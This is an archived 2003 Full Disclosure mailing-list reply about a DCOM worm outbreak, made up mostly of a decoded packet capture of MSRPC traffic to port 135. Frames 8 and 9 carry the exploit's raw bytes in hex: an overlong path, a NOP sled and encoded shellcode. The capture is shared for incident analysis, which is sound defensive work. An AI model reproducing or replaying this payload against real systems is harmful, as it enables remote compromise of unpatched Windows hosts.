Full Disclosure mailing list archives
RE: DCOM
From: "Jason Coombs" <jasonc () science org>
Date: Mon, 11 Aug 2003 10:17:11 -1000
Is this what you're seeing? 6 66.859375 BEFC20000500 XEROX 000000 MSRPC c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0 67.30.174.214 WIN2KDEV IP Frame: Base frame properties Frame: Time of capture = 8/11/2003 9:25:11.405 Frame: Time delta from previous physical frame: 8687500 microseconds Frame: Frame number: 6 Frame: Total frame length: 126 bytes Frame: Capture frame length: 126 bytes Frame: Frame data: Number of data bytes remaining = 126 (0x007E) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 000005000000 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : BEFC20000500 ETHERNET: .......0 = No routing information present ETHERNET: ......1. = Locally administered address ETHERNET: Frame Length : 126 (0x007E) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070) IP: ID = 0x1C04; Proto = TCP; Len: 112 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Precedence = Routine IP: Type of Service = Normal Service IP: Total Length = 112 (0x70) IP: Identification = 7172 (0x1C04) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 125 (0x7D) IP: Protocol = TCP - Transmission Control IP: Checksum = 0x0138 IP: Source Address = 67.30.174.214 IP: Destination Address = 67.30.171.57 IP: Data: Number of data bytes remaining = 92 (0x005C) TCP: .AP..., len: 72, seq:3551092873-3551092945, ack: 188699400, win: 8160, src: 3843 dst: 135 TCP: Source Port = 0x0F03 TCP: Destination Port = Location Service TCP: Sequence Number = 3551092873 (0xD3A96089) TCP: Acknowledgement Number = 188699400 (0xB3F5308) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8160 (0x1FE0) TCP: Checksum = 0xC46A TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 72 (0x0048) MSRPC: c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0 MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0) MSRPC: Packet Type = Bind MSRPC: Flags 1 = 3 (0x3) MSRPC: .......1 = Reserved -or- First fragment (AES/DC) MSRPC: ......1. = Last fragment -or- Cancel pending MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC) MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC) MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC) MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC) MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC) MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC) MSRPC: Packed Data Representation MSRPC: Fragment Length = 72 (0x48) MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 127 (0x7F) MSRPC: Max Trans Frag Size = 5840 (0x16D0) MSRPC: Max Recv Frag Size = 5840 (0x16D0) MSRPC: Assoc Group Identifier = 0 (0x0) MSRPC: Presentation Context List MSRPC: Number of Context Elements = 1 (0x1) MSRPC: Presentation Context Identifier = 1 (0x1) MSRPC: Number of Transfer Syntaxs = 1 (0x1) MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046 MSRPC: Abstract Interface Version = 0 (0x0) MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860 MSRPC: Transfer Interface Version = 2 (0x2) 00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E. 00010: 00 70 1C 04 40 00 7D 06 01 38 43 1E AE D6 43 1E .p..@.}..8C.®ÖC. 00020: AB 39 0F 03 00 87 D3 A9 60 89 0B 3F 53 08 50 18 «9...?Ó©`?.?S.P. 00030: 1F E0 C4 6A 00 00 05 00 0B 03 10 00 00 00 48 00 .àÄj..........H. 00040: 00 00 7F 00 00 00 D0 16 D0 16 00 00 00 00 01 00 .....Ð.Ð....... 00050: 00 00 01 00 01 00 A0 01 00 00 00 00 00 00 C0 00 ...... .......À. 00060: 00 00 00 00 00 46 00 00 00 00 04 5D 88 8A EB 1C .....F.....]??ë. 00070: C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 É.?è..+.H`.... 7 66.859375 XEROX 000000 BEFC20000500 MSRPC c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0 WIN2KDEV 67.30.174.214 IP Frame: Base frame properties Frame: Time of capture = 8/11/2003 9:25:11.405 Frame: Time delta from previous physical frame: 0 microseconds Frame: Frame number: 7 Frame: Total frame length: 114 bytes Frame: Capture frame length: 114 bytes Frame: Frame data: Number of data bytes remaining = 114 (0x0072) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : BEFC20000500 ETHERNET: .......0 = Individual address ETHERNET: ......1. = Locally administered address ETHERNET: Source address : 000005000000 ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 114 (0x0072) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 100 (0x0064) IP: ID = 0x1E94; Proto = TCP; Len: 100 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Precedence = Routine IP: Type of Service = Normal Service IP: Total Length = 100 (0x64) IP: Identification = 7828 (0x1E94) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0xFBB3 IP: Source Address = 67.30.171.57 IP: Destination Address = 67.30.174.214 IP: Data: Number of data bytes remaining = 80 (0x0050) TCP: .AP..., len: 60, seq: 188699400-188699460, ack:3551092945, win: 8088, src: 135 dst: 3843 TCP: Source Port = Location Service TCP: Destination Port = 0x0F03 TCP: Sequence Number = 188699400 (0xB3F5308) TCP: Acknowledgement Number = 3551092945 (0xD3A960D1) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8088 (0x1F98) TCP: Checksum = 0xEDFA TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 60 (0x003C) MSRPC: c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0 MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0) MSRPC: Packet Type = Bind Ack MSRPC: Flags 1 = 3 (0x3) MSRPC: .......1 = Reserved -or- First fragment (AES/DC) MSRPC: ......1. = Last fragment -or- Cancel pending MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC) MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC) MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC) MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC) MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC) MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC) MSRPC: Packed Data Representation MSRPC: Fragment Length = 60 (0x3C) MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 127 (0x7F) MSRPC: Max Trans Frag Size = 5840 (0x16D0) MSRPC: Max Recv Frag Size = 5840 (0x16D0) MSRPC: Assoc Group Identifier = 37081 (0x90D9) MSRPC: Secondary Address MSRPC: Secondary Address Length = 4 (0x4) MSRPC: Secondary Address Port MSRPC: Padding Byte(s) MSRPC: Result List MSRPC: Number of Results = 1 (0x1) MSRPC: Reserved = 0 (0x0) MSRPC: Reserved 2 MSRPC: Presentation Context Results MSRPC: Result = Acceptance MSRPC: Reason = Reason not specified MSRPC: Transfer Syntax MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860 MSRPC: Transfer Interface Version = 2 (0x2) 00000: BE FC 20 00 05 00 00 00 05 00 00 00 08 00 45 00 ¾ü ...........E. 00010: 00 64 1E 94 40 00 80 06 FB B3 43 1E AB 39 43 1E .d.?@.?.û³C.«9C. 00020: AE D6 00 87 0F 03 0B 3F 53 08 D3 A9 60 D1 50 18 ®Ö.?...?S.Ó©`ÑP. 00030: 1F 98 ED FA 00 00 05 00 0C 03 10 00 00 00 3C 00 .?íú..........<. 00040: 00 00 7F 00 00 00 D0 16 D0 16 D9 90 00 00 04 00 .....Ð.Ð.Ù.... 00050: 31 33 35 00 00 00 01 00 00 00 00 00 00 00 04 5D 135............] 00060: 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 ??ë.É.?è..+.H`.. 00070: 00 00 .. 8 67.281250 BEFC20000500 XEROX 000000 MSRPC c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690 67.30.174.214 WIN2KDEV IP Frame: Base frame properties Frame: Time of capture = 8/11/2003 9:25:11.827 Frame: Time delta from previous physical frame: 421875 microseconds Frame: Frame number: 8 Frame: Total frame length: 1414 bytes Frame: Capture frame length: 1414 bytes Frame: Frame data: Number of data bytes remaining = 1414 (0x0586) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 000005000000 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : BEFC20000500 ETHERNET: .......0 = No routing information present ETHERNET: ......1. = Locally administered address ETHERNET: Frame Length : 1414 (0x0586) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 1400 (0x0578) IP: ID = 0x1C05; Proto = TCP; Len: 1400 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Precedence = Routine IP: Type of Service = Normal Service IP: Total Length = 1400 (0x578) IP: Identification = 7173 (0x1C05) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 125 (0x7D) IP: Protocol = TCP - Transmission Control IP: Checksum = 0xFC2E IP: Source Address = 67.30.174.214 IP: Destination Address = 67.30.171.57 IP: Data: Number of data bytes remaining = 1380 (0x0564) TCP: .A...., len: 1360, seq:3551092945-3551094305, ack: 188699400, win: 8160, src: 3843 dst: 135 TCP: Source Port = 0x0F03 TCP: Destination Port = Location Service TCP: Sequence Number = 3551092945 (0xD3A960D1) TCP: Acknowledgement Number = 188699400 (0xB3F5308) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x10 : .A.... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....0... = No Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8160 (0x1FE0) TCP: Checksum = 0x9219 TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 1360 (0x0550) MSRPC: c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690 MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0) MSRPC: Packet Type = Request MSRPC: Flags 1 = 3 (0x3) MSRPC: .......1 = Reserved -or- First fragment (AES/DC) MSRPC: ......1. = Last fragment -or- Cancel pending MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC) MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC) MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC) MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC) MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC) MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC) MSRPC: Packed Data Representation MSRPC: Fragment Length = 1704 (0x6A8) MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 229 (0xE5) MSRPC: Bind Frame Number = 6 (0x6) MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046 MSRPC: Allocation Hint = 1680 (0x690) MSRPC: Presentation Context Identifier = 1 (0x1) MSRPC: Operation Number (c/o Request prop. dg header prop) = 4 (0x4) MSRPC: Stub Data 00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E. 00010: 05 78 1C 05 40 00 7D 06 FC 2E 43 1E AE D6 43 1E .x..@.}.ü.C.®ÖC. 00020: AB 39 0F 03 00 87 D3 A9 60 D1 0B 3F 53 08 50 10 «9...?Ó©`Ñ.?S.P. 00030: 1F E0 92 19 00 00 05 00 00 03 10 00 00 00 A8 06 .à?...........¨. 00040: 00 00 E5 00 00 00 90 06 00 00 01 00 04 00 05 00 ..å............ 00050: 06 00 01 00 00 00 00 00 00 00 32 24 58 FD CC 45 ..........2$XýÌE 00060: 64 49 B0 70 DD AE 74 2C 96 D2 60 5E 0D 00 01 00 dI°pÝ®t,?Ò`^.... 00070: 00 00 00 00 00 00 70 5E 0D 00 02 00 00 00 7C 5E ......p^......|^ 00080: 0D 00 00 00 00 00 10 00 00 00 80 96 F1 F1 2A 4D ..........??ññ*M 00090: CE 11 A6 6A 00 20 AF 6E 72 F4 0C 00 00 00 4D 41 Î.¦j. ¯nrô....MA 000A0: 52 42 01 00 00 00 00 00 00 00 0D F0 AD BA 00 00 RB.........ðº.. 000B0: 00 00 A8 F4 0B 00 20 06 00 00 20 06 00 00 4D 45 ..¨ô.. ... ...ME 000C0: 4F 57 04 00 00 00 A2 01 00 00 00 00 00 00 C0 00 OW....¢.......À. 000D0: 00 00 00 00 00 46 38 03 00 00 00 00 00 00 C0 00 .....F8.......À. 000E0: 00 00 00 00 00 46 00 00 00 00 F0 05 00 00 E8 05 .....F....ð...è. 000F0: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC C8 00 ..........ÌÌÌÌÈ. 00100: 00 00 4D 45 4F 57 E8 05 00 00 D8 00 00 00 00 00 ..MEOWè...Ø..... 00110: 00 00 02 00 00 00 07 00 00 00 00 00 00 00 00 00 ................ 00120: 00 00 00 00 00 00 00 00 00 00 C4 28 CD 00 64 29 ..........Ä(Í.d) 00130: CD 00 00 00 00 00 07 00 00 00 B9 01 00 00 00 00 Í.........¹..... 00140: 00 00 C0 00 00 00 00 00 00 46 AB 01 00 00 00 00 ..À......F«..... 00150: 00 00 C0 00 00 00 00 00 00 46 A5 01 00 00 00 00 ..À......F¥..... 00160: 00 00 C0 00 00 00 00 00 00 46 A6 01 00 00 00 00 ..À......F¦..... 00170: 00 00 C0 00 00 00 00 00 00 46 A4 01 00 00 00 00 ..À......F¤..... 00180: 00 00 C0 00 00 00 00 00 00 46 AD 01 00 00 00 00 ..À......F..... 00190: 00 00 C0 00 00 00 00 00 00 46 AA 01 00 00 00 00 ..À......Fª..... 001A0: 00 00 C0 00 00 00 00 00 00 46 07 00 00 00 60 00 ..À......F....`. 001B0: 00 00 58 00 00 00 90 00 00 00 40 00 00 00 20 00 ..X......@... . 001C0: 00 00 38 03 00 00 30 00 00 00 01 00 00 00 01 10 ..8...0......... 001D0: 08 00 CC CC CC CC 50 00 00 00 4F B6 88 20 FF FF ..ÌÌÌÌP...O¶? ÿÿ 001E0: FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ÿÿ.............. 001F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 10 ................ 00230: 08 00 CC CC CC CC 48 00 00 00 07 00 66 00 06 09 ..ÌÌÌÌH.....f... 00240: 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 10 00 ......À......F.. 00250: 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 ................ 00260: 00 00 78 19 0C 00 58 00 00 00 05 00 06 00 01 00 ..x...X......... 00270: 00 00 70 D8 98 93 98 4F D2 11 A9 3D BE 57 B2 00 ..pØ???OÒ.©=¾W². 00280: 00 00 32 00 31 00 01 10 08 00 CC CC CC CC 80 00 ..2.1.....ÌÌÌÌ?. 00290: 00 00 0D F0 AD BA 00 00 00 00 00 00 00 00 00 00 ...ðº.......... 002A0: 00 00 00 00 00 00 18 43 14 00 00 00 00 00 60 00 .......C......`. 002B0: 00 00 60 00 00 00 4D 45 4F 57 04 00 00 00 C0 01 ..`...MEOW....À. 002C0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 3B 03 ......À......F;. 002D0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 ......À......F.. 002E0: 00 00 30 00 00 00 01 00 01 00 81 C5 17 03 80 0E ..0.......Å..?. 002F0: E9 4A 99 99 F1 8A 50 6F 7A 85 02 00 00 00 00 00 éJ??ñ?Poz?...... 00300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00310: 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 30 00 ..........ÌÌÌÌ0. 00320: 00 00 78 00 6E 00 00 00 00 00 D8 DA 0D 00 00 00 ..x.n.....ØÚ.... 00330: 00 00 00 00 00 00 20 2F 0C 00 00 00 00 00 00 00 ...... /........ 00340: 00 00 03 00 00 00 00 00 00 00 03 00 00 00 46 00 ..............F. 00350: 58 00 00 00 00 00 01 10 08 00 CC CC CC CC 10 00 X.........ÌÌÌÌ.. 00360: 00 00 30 00 2E 00 00 00 00 00 00 00 00 00 00 00 ..0............. 00370: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC 68 00 ..........ÌÌÌÌh. 00380: 00 00 0E 00 FF FF 68 8B 0B 00 02 00 00 00 00 00 ....ÿÿh?........ 00390: 00 00 00 00 00 00 86 01 00 00 00 00 00 00 86 01 ......?.......?. 003A0: 00 00 5C 00 5C 00 46 00 58 00 4E 00 42 00 46 00 ..\.\.F.X.N.B.F. 003B0: 58 00 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 X.F.X.N.B.F.X.F. 003C0: 58 00 46 00 58 00 46 00 58 00 9D 13 00 01 CC E0 X.F.X.F.X....Ìà 003D0: FD 7F CC E0 FD 7F 90 90 90 90 90 90 90 90 90 90 ýÌàý 003E0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 003F0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00400: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00410: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00420: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00430: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00440: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00450: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00460: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00470: 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 19 5E ë.^ 00480: 31 C9 81 E9 89 FF FF FF 81 36 80 BF 32 94 81 EE 1Éé?ÿÿÿ6?¿2?î 00490: FC FF FF FF E2 F2 EB 05 E8 E2 FF FF FF 03 53 06 üÿÿÿâòë.èâÿÿÿ.S. 004A0: 1F 74 57 75 95 80 BF BB 92 7F 89 5A 1A CE B1 DE .tWu??¿»??Z.Î±Þ 004B0: 7C E1 BE 32 94 09 F9 3A 6B B6 D7 9F 4D 85 71 DA |á¾2?.ù:k¶×?M?qÚ 004C0: C6 81 BF 32 1D C6 B3 5A F8 EC BF 32 FC B3 8D 1C Æ¿2.ƳZøì¿2ü³. 004D0: F0 E8 C8 41 A6 DF EB CD C2 88 36 74 90 7F 89 5A ðèÈA¦ßëÍÂ?6t?Z 004E0: E6 7E 0C 24 7C AD BE 32 94 09 F9 22 6B B6 D7 4C æ~.$|¾2?.ù"k¶×L 004F0: 4C 62 CC DA 8A 81 BF 32 1D C6 AB CD E2 84 D7 F9 LbÌÚ?¿2.Æ«Íâ?×ù 00500: 79 7C 84 DA 9A 81 BF 32 1D C6 A7 CD E2 84 D7 EB y|?Ú?¿2.ƧÍâ?×ë 00510: 9D 75 12 DA 6A 80 BF 32 1D C6 A3 CD E2 84 D7 96 u.Új?¿2.Æ£Íâ?×? 00520: 8E F0 78 DA 7A 80 BF 32 1D C6 9F CD E2 84 D7 96 ?ðxÚz?¿2.Æ?Íâ?×? 00530: 39 AE 56 DA 4A 80 BF 32 1D C6 9B CD E2 84 D7 D7 9®VÚJ?¿2.Æ?Íâ?×× 00540: DD 06 F6 DA 5A 80 BF 32 1D C6 97 CD E2 84 D7 D5 Ý.öÚZ?¿2.Æ?Íâ?×Õ 00550: ED 46 C6 DA 2A 80 BF 32 1D C6 93 01 6B 01 53 A2 íFÆÚ*?¿2.Æ?.k.S¢ 00560: 95 80 BF 66 FC 81 BE 32 94 7F E9 2A C4 D0 EF 62 ??¿fü¾2?é*ÄÐïb 00570: D4 D0 FF 62 6B D6 A3 B9 4C D7 E8 5A 96 80 AE 6E ÔÐÿbkÖ£¹L×èZ??®n 00580: 1F 4C D5 24 C5 D3 .LÕ$ÅÓ 9 67.390625 BEFC20000500 XEROX 000000 TCP .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135 67.30.174.214 WIN2KDEV IP Frame: Base frame properties Frame: Time of capture = 8/11/2003 9:25:11.936 Frame: Time delta from previous physical frame: 109375 microseconds Frame: Frame number: 9 Frame: Total frame length: 398 bytes Frame: Capture frame length: 398 bytes Frame: Frame data: Number of data bytes remaining = 398 (0x018E) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 000005000000 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : BEFC20000500 ETHERNET: .......0 = No routing information present ETHERNET: ......1. = Locally administered address ETHERNET: Frame Length : 398 (0x018E) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 384 (0x0180) IP: ID = 0x1C06; Proto = TCP; Len: 384 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Precedence = Routine IP: Type of Service = Normal Service IP: Total Length = 384 (0x180) IP: Identification = 7174 (0x1C06) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 125 (0x7D) IP: Protocol = TCP - Transmission Control IP: Checksum = 0x0026 IP: Source Address = 67.30.174.214 IP: Destination Address = 67.30.171.57 IP: Data: Number of data bytes remaining = 364 (0x016C) TCP: .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135 TCP: Source Port = 0x0F03 TCP: Destination Port = Location Service TCP: Sequence Number = 3551094305 (0xD3A96621) TCP: Acknowledgement Number = 188699400 (0xB3F5308) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8160 (0x1FE0) TCP: Checksum = 0xDBD3 TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 344 (0x0158) 00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E. 00010: 01 80 1C 06 40 00 7D 06 00 26 43 1E AE D6 43 1E .?..@.}..&C.®ÖC. 00020: AB 39 0F 03 00 87 D3 A9 66 21 0B 3F 53 08 50 18 «9...?Ó©f!.?S.P. 00030: 1F E0 DB D3 00 00 40 64 B4 D7 EC CD C2 A4 E8 63 .àÛÓ..@d´×ìͤèc 00040: C7 7F E9 1A 1F 50 D7 57 EC E5 BF 5A F7 ED DB 1C Çé..P×Wìå¿Z÷íÛ. 00050: 1D E6 8F B1 78 D4 32 0E B0 B3 7F 01 5D 03 7E 27 .æ±xÔ2.°³.].~' 00060: 3F 62 42 F4 D0 A4 AF 76 6A C4 9B 0F 1D D4 9B 7A ?bBôФ¯vjÄ?..Ô?z 00070: 1D D4 9B 7E 1D D4 9B 62 19 C4 9B 22 C0 D0 EE 63 .Ô?~.Ô?b.Ä?"ÀÐîc 00080: C5 EA BE 63 C5 7F C9 02 C5 7F E9 22 1F 4C D5 CD Åê¾cÅÉ.Åé".LÕÍ 00090: 6B B1 40 64 98 0B 77 65 6B D6 93 CD C2 94 EA 64 k±@d?.wekÖ?ÍÂ?êd 000A0: F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E ð!2??:òì?4r?.Ï. 000B0: 39 0B D7 3A 7F 89 34 72 A0 0B 17 8A 94 80 BF B9 9.×:?4r ..???¿¹ 000C0: 51 DE E2 F0 90 80 EC 67 C2 D7 34 5E B0 98 34 77 QÞâð?ìgÂ×4^°?4w 000D0: A8 0B EB 37 EC 83 6A B9 DE 98 34 68 B4 83 62 D1 ¨.ë7ì?j¹Þ?4h´?bÑ 000E0: A6 C9 34 06 1F 83 4A 01 6B 7C 8C F2 38 BA 7B 46 ¦É4..?J.k|?ò8º{F 000F0: 93 41 70 3F 97 78 54 C0 AF FC 9B 26 E1 61 34 68 ?Ap??xTÀ¯ü?&áa4h 00100: B0 83 62 54 1F 8C F4 B9 CE 9C BC EF 1F 84 34 31 °?bT.?ô¹Î?¼ï.?41 00110: 51 6B BD 01 54 0B 6A 6D CA DD E4 F0 90 80 2F A2 Qk½.T.jmÊÝäð?/¢ 00120: 04 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00 ..\.C.$.\.1.2.3. 00130: 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00 4.5.6.1.1.1.1.1. 00140: 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1. 00150: 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10 1.1...d.o.c..... 00160: 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00 ..ÌÌÌÌ ...0.-... 00170: 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C ..?*..........(? 00180: 0C 00 01 00 00 00 07 00 00 00 00 00 00 00 .............. -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com]On Behalf Of Paul Marsh Sent: Monday, August 11, 2003 8:56 AM To: Full-Disclosure (E-mail) Subject: [Full-disclosure] DCOM Looks like a worm has been released, check your logs. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- DCOM Paul Marsh (Aug 11)
- <Possible follow-ups>
- DCOM Paul Marsh (Aug 11)
- DCOM Worm released Joey (Aug 11)
- Re: DCOM Worm released Dennis Opacki (Aug 11)
- Re: DCOM Worm released Dennis Opacki (Aug 11)
- Re: DCOM Worm released Jordan Wiens (Aug 11)
- RE: DCOM Worm released Marc Maiffret (Aug 11)
- Re: DCOM Worm released daniel uriah clemens (Aug 11)
- RE: DCOM Worm released gml (Aug 11)
- DCOM Worm released Joey (Aug 11)
- Re: DCOM Worm released Nils (Aug 11)